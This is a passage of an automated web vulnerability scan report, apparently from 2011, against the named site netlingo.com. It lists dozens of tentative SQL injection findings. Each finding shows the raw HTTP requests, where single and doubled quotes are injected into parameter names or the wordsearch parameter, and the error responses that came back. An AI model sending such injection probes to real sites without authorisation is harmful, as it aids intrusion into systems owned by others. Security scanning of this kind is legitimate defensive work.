GET /press/about-netlingo.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/about-netlingo.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 74639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.88. http://www.netlingo.com/press/all-press-clippings.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /press/all-press-clippings.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/all-press-clippings.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/all-press-clippings.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 82347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.89. http://www.netlingo.com/press/awards.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /press/awards.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/awards.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/awards.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.90. http://www.netlingo.com/press/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /press/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.91. http://www.netlingo.com/press/media.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /press/media.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/media.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/media.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 69717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.92. http://www.netlingo.com/press/meet-erin.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /press/meet-erin.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/meet-erin.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/meet-erin.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.93. http://www.netlingo.com/press/print.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /press/print.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/print.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/print.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 101167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.94. http://www.netlingo.com/press/teen-text-talk.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /press/teen-text-talk.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/teen-text-talk.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/teen-text-talk.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.95. http://www.netlingo.com/press/web.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /press/web.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/web.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/web.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 80093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.96. http://www.netlingo.com/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /search.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /search.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.97. http://www.netlingo.com/searchaction.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /searchaction.cfm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /searchaction.cfm?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /searchaction.cfm?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.98. http://www.netlingo.com/searchaction.cfm [wordsearch parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /searchaction.cfm

Issue detail

The wordsearch parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the wordsearch parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /searchaction.cfm?wordsearch=' HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /searchaction.cfm?wordsearch='' HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.99. http://www.netlingo.com/shop/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /shop/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=cvdec0h51t0k7o22knmh2jtes1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /shop/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=hd00odods0lc2mcdij9pevq4p1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.100. http://www.netlingo.com/shop/netlingo-the-dictionary.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /shop/netlingo-the-dictionary.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop/netlingo-the-dictionary.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /shop/netlingo-the-dictionary.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.101. http://www.netlingo.com/shop/netlingo-the-list.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /shop/netlingo-the-list.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop/netlingo-the-list.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /shop/netlingo-the-list.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.102. http://www.netlingo.com/shop/online-store.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /shop/online-store.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop/online-store.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /shop/online-store.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.103. http://www.netlingo.com/shop/shopping-cart.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /shop/shopping-cart.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop/shopping-cart.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=p9c9ct3je5ii9vad32m3c8gn86; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /shop/shopping-cart.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=2g4a2u0pigp54vsur83c882sd2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 32824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.104. http://www.netlingo.com/smileys.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /smileys.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /smileys.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /smileys.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.105. http://www.netlingo.com/subscribe.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /subscribe.php

Issue detail

